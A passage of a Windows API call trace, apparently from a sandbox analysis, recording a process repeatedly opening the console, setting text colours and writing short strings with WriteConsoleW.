(lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0160.504] GetLastError () returned 0xcb [0160.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.504] GetLastError () returned 0xcb [0160.508] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0160.508] GetLastError () returned 0xcb [0160.508] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.508] GetLastError () returned 0xcb [0160.512] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.513] GetLastError () returned 0xcb [0160.513] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.513] GetLastError () returned 0xcb [0160.513] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0160.513] GetLastError () returned 0xcb [0160.513] CloseHandle (hObject=0x3b) returned 1 [0160.513] GetLastError () returned 0xcb [0160.517] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.517] GetLastError () returned 0xcb [0160.517] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.518] GetLastError () returned 0xcb [0160.518] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0160.518] GetLastError () returned 0xcb [0160.518] CloseHandle (hObject=0x3b) returned 1 [0160.518] GetLastError () returned 0xcb [0160.522] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.522] GetLastError () returned 0xcb [0160.522] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x5dcea4c | out: lpMode=0x5dcea4c) returned 1 [0160.522] GetLastError () returned 0xcb [0160.522] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2bda3f0*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x5dcea4c, lpReserved=0x0 | out: lpBuffer=0x2bda3f0*, lpNumberOfCharsWritten=0x5dcea4c*=0x3e) returned 1 [0160.523] GetLastError () returned 0xcb [0160.523] CloseHandle (hObject=0x3b) returned 1 [0160.523] GetLastError () returned 0xcb [0160.527] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.527] GetLastError () returned 0xcb [0160.527] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.527] GetLastError () returned 0xcb [0160.527] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0160.527] GetLastError () returned 0xcb [0160.527] CloseHandle (hObject=0x3b) returned 1 [0160.528] GetLastError () returned 0xcb [0160.531] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.531] GetLastError () returned 0xcb [0160.531] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.532] GetLastError () returned 0xcb [0160.532] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0160.532] GetLastError () returned 0xcb [0160.532] CloseHandle (hObject=0x3b) returned 1 [0160.532] GetLastError () returned 0xcb [0160.536] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.536] GetLastError () returned 0xcb [0160.536] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x5dcea8c | out: lpMode=0x5dcea8c) returned 1 [0160.536] GetLastError () returned 0xcb [0160.536] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2919938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea8c, lpReserved=0x0 | out: lpBuffer=0x2919938*, lpNumberOfCharsWritten=0x5dcea8c*=0x1) returned 1 [0160.537] GetLastError () returned 0xcb [0160.537] CloseHandle (hObject=0x3b) returned 1 [0160.537] GetLastError () returned 0xcb [0160.541] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.580] GetLastError () returned 0xcb [0160.580] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dcea58 | out: lpConsoleScreenBufferInfo=0x5dcea58) returned 1 [0160.580] GetLastError () returned 0xcb [0160.580] GetConsoleOutputCP () returned 0x1b5 [0160.580] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.580] GetLastError () returned 0xcb [0160.584] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0160.584] GetLastError () returned 0xcb [0160.584] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.584] GetLastError () returned 0xcb [0160.588] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43 [0160.588] GetLastError () returned 0xcb [0160.588] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.588] GetLastError () returned 0xcb [0160.593] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.593] GetLastError () returned 0xcb [0160.593] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.593] GetLastError () returned 0xcb [0160.593] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0160.594] GetLastError () returned 0xcb [0160.594] CloseHandle (hObject=0x47) returned 1 [0160.594] GetLastError () returned 0xcb [0160.597] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.598] GetLastError () returned 0xcb [0160.598] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.598] GetLastError () returned 0xcb [0160.598] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0160.598] GetLastError () returned 0xcb [0160.598] CloseHandle (hObject=0x47) returned 1 [0160.599] GetLastError () returned 0xcb [0160.603] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.603] GetLastError () returned 0xcb [0160.603] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x5dcea4c | out: lpMode=0x5dcea4c) returned 1 [0160.603] GetLastError () returned 0xcb [0160.603] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2bda808*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x5dcea4c, lpReserved=0x0 | out: lpBuffer=0x2bda808*, lpNumberOfCharsWritten=0x5dcea4c*=0x11) returned 1 [0160.604] GetLastError () returned 0xcb [0160.604] CloseHandle (hObject=0x47) returned 1 [0160.604] GetLastError () returned 0xcb [0160.608] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.608] GetLastError () returned 0xcb [0160.608] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.608] GetLastError () returned 0xcb [0160.608] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0160.609] GetLastError () returned 0xcb [0160.609] CloseHandle (hObject=0x47) returned 1 [0160.609] GetLastError () returned 0xcb [0160.613] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.613] GetLastError () returned 0xcb [0160.613] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.613] GetLastError () returned 0xcb [0160.613] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0160.613] GetLastError () returned 0xcb [0160.613] CloseHandle (hObject=0x47) returned 1 [0160.614] GetLastError () returned 0xcb [0160.618] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.657] GetLastError () returned 0xcb [0160.657] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x5dcea8c | out: lpMode=0x5dcea8c) returned 1 [0160.658] GetLastError () returned 0xcb [0160.658] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2919938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea8c, lpReserved=0x0 | out: lpBuffer=0x2919938*, lpNumberOfCharsWritten=0x5dcea8c*=0x1) returned 1 [0160.658] GetLastError () returned 0xcb [0160.658] CloseHandle (hObject=0x47) returned 1 [0160.658] GetLastError () returned 0xcb [0160.663] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.664] GetLastError () returned 0xcb [0160.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dcea58 | out: lpConsoleScreenBufferInfo=0x5dcea58) returned 1 [0160.664] GetLastError () returned 0xcb [0160.664] GetConsoleOutputCP () returned 0x1b5 [0160.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.664] GetLastError () returned 0xcb [0160.668] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b [0160.669] GetLastError () returned 0xcb [0160.669] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.669] GetLastError () returned 0xcb [0160.672] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f [0160.673] GetLastError () returned 0xcb [0160.673] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.673] GetLastError () returned 0xcb [0160.677] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.677] GetLastError () returned 0xcb [0160.677] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.678] GetLastError () returned 0xcb [0160.678] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0160.678] GetLastError () returned 0xcb [0160.678] CloseHandle (hObject=0x53) returned 1 [0160.678] GetLastError () returned 0xcb [0160.682] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.682] GetLastError () returned 0xcb [0160.682] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.682] GetLastError () returned 0xcb [0160.682] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0160.683] GetLastError () returned 0xcb [0160.683] CloseHandle (hObject=0x53) returned 1 [0160.683] GetLastError () returned 0xcb [0160.686] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.687] GetLastError () returned 0xcb [0160.687] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x5dcea4c | out: lpMode=0x5dcea4c) returned 1 [0160.687] GetLastError () returned 0xcb [0160.687] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2bdab80*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0x5dcea4c, lpReserved=0x0 | out: lpBuffer=0x2bdab80*, lpNumberOfCharsWritten=0x5dcea4c*=0x39) returned 1 [0160.687] GetLastError () returned 0xcb [0160.687] CloseHandle (hObject=0x53) returned 1 [0160.687] GetLastError () returned 0xcb [0160.691] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.691] GetLastError () returned 0xcb [0160.691] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.691] GetLastError () returned 0xcb [0160.691] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0160.691] GetLastError () returned 0xcb [0160.691] CloseHandle (hObject=0x53) returned 1 [0160.692] GetLastError () returned 0xcb [0160.695] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.732] GetLastError () returned 0xcb [0160.732] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.733] GetLastError () returned 0xcb [0160.733] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0160.733] GetLastError () returned 0xcb [0160.733] CloseHandle (hObject=0x53) returned 1 [0160.733] GetLastError () returned 0xcb [0160.737] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.737] GetLastError () returned 0xcb [0160.737] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x5dcea8c | out: lpMode=0x5dcea8c) returned 1 [0160.738] GetLastError () returned 0xcb [0160.738] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2919938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea8c, lpReserved=0x0 | out: lpBuffer=0x2919938*, lpNumberOfCharsWritten=0x5dcea8c*=0x1) returned 1 [0160.738] GetLastError () returned 0xcb [0160.738] CloseHandle (hObject=0x53) returned 1 [0160.738] GetLastError () returned 0xcb [0160.742] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.742] GetLastError () returned 0xcb [0160.742] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dcea58 | out: lpConsoleScreenBufferInfo=0x5dcea58) returned 1 [0160.742] GetLastError () returned 0xcb [0160.742] GetConsoleOutputCP () returned 0x1b5 [0160.742] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.742] GetLastError () returned 0xcb [0160.746] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57 [0160.747] GetLastError () returned 0xcb [0160.747] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.747] GetLastError () returned 0xcb [0160.751] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b [0160.751] GetLastError () returned 0xcb [0160.751] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.751] GetLastError () returned 0xcb [0160.754] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.755] GetLastError () returned 0xcb [0160.755] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.755] GetLastError () returned 0xcb [0160.755] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0160.755] GetLastError () returned 0xcb [0160.755] CloseHandle (hObject=0x5f) returned 1 [0160.755] GetLastError () returned 0xcb [0160.759] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.759] GetLastError () returned 0xcb [0160.759] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.760] GetLastError () returned 0xcb [0160.760] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0160.760] GetLastError () returned 0xcb [0160.760] CloseHandle (hObject=0x5f) returned 1 [0160.760] GetLastError () returned 0xcb [0160.764] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.764] GetLastError () returned 0xcb [0160.764] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x5dcea4c | out: lpMode=0x5dcea4c) returned 1 [0160.764] GetLastError () returned 0xcb [0160.764] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2bdb06c*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5dcea4c, lpReserved=0x0 | out: lpBuffer=0x2bdb06c*, lpNumberOfCharsWritten=0x5dcea4c*=0x4f) returned 1 [0160.765] GetLastError () returned 0xcb [0160.765] CloseHandle (hObject=0x5f) returned 1 [0160.765] GetLastError () returned 0xcb [0160.768] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.809] GetLastError () returned 0xcb [0160.809] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.809] GetLastError () returned 0xcb [0160.809] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0160.810] GetLastError () returned 0xcb [0160.810] CloseHandle (hObject=0x5f) returned 1 [0160.810] GetLastError () returned 0xcb [0160.815] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.815] GetLastError () returned 0xcb [0160.815] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.815] GetLastError () returned 0xcb [0160.815] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0160.816] GetLastError () returned 0xcb [0160.816] CloseHandle (hObject=0x5f) returned 1 [0160.816] GetLastError () returned 0xcb [0160.820] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.820] GetLastError () returned 0xcb [0160.820] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x5dcea8c | out: lpMode=0x5dcea8c) returned 1 [0160.821] GetLastError () returned 0xcb [0160.821] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2919938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea8c, lpReserved=0x0 | out: lpBuffer=0x2919938*, lpNumberOfCharsWritten=0x5dcea8c*=0x1) returned 1 [0160.821] GetLastError () returned 0xcb [0160.821] CloseHandle (hObject=0x5f) returned 1 [0160.821] GetLastError () returned 0xcb [0160.825] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.825] GetLastError () returned 0xcb [0160.825] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5dcea58 | out: lpConsoleScreenBufferInfo=0x5dcea58) returned 1 [0160.826] GetLastError () returned 0xcb [0160.826] GetConsoleOutputCP () returned 0x1b5 [0160.826] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.826] GetLastError () returned 0xcb [0160.830] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63 [0160.830] GetLastError () returned 0xcb [0160.830] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.830] GetLastError () returned 0xcb [0160.834] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67 [0160.834] GetLastError () returned 0xcb [0160.834] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.834] GetLastError () returned 0xcb [0160.838] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.838] GetLastError () returned 0xcb [0160.838] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.838] GetLastError () returned 0xcb [0160.838] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0160.839] GetLastError () returned 0xcb [0160.839] CloseHandle (hObject=0x6b) returned 1 [0160.839] GetLastError () returned 0xcb [0160.842] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.843] GetLastError () returned 0xcb [0160.843] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.843] GetLastError () returned 0xcb [0160.843] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0160.843] GetLastError () returned 0xcb [0160.843] CloseHandle (hObject=0x6b) returned 1 [0160.843] GetLastError () returned 0xcb [0160.848] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.885] GetLastError () returned 0xcb [0160.885] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x5dcea4c | out: lpMode=0x5dcea4c) returned 1 [0160.886] GetLastError () returned 0xcb [0160.886] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x2bdb548*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x5dcea4c, lpReserved=0x0 | out: lpBuffer=0x2bdb548*, lpNumberOfCharsWritten=0x5dcea4c*=0x19) returned 1 [0160.886] GetLastError () returned 0xcb [0160.886] CloseHandle (hObject=0x6b) returned 1 [0160.886] GetLastError () returned 0xcb [0160.891] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), 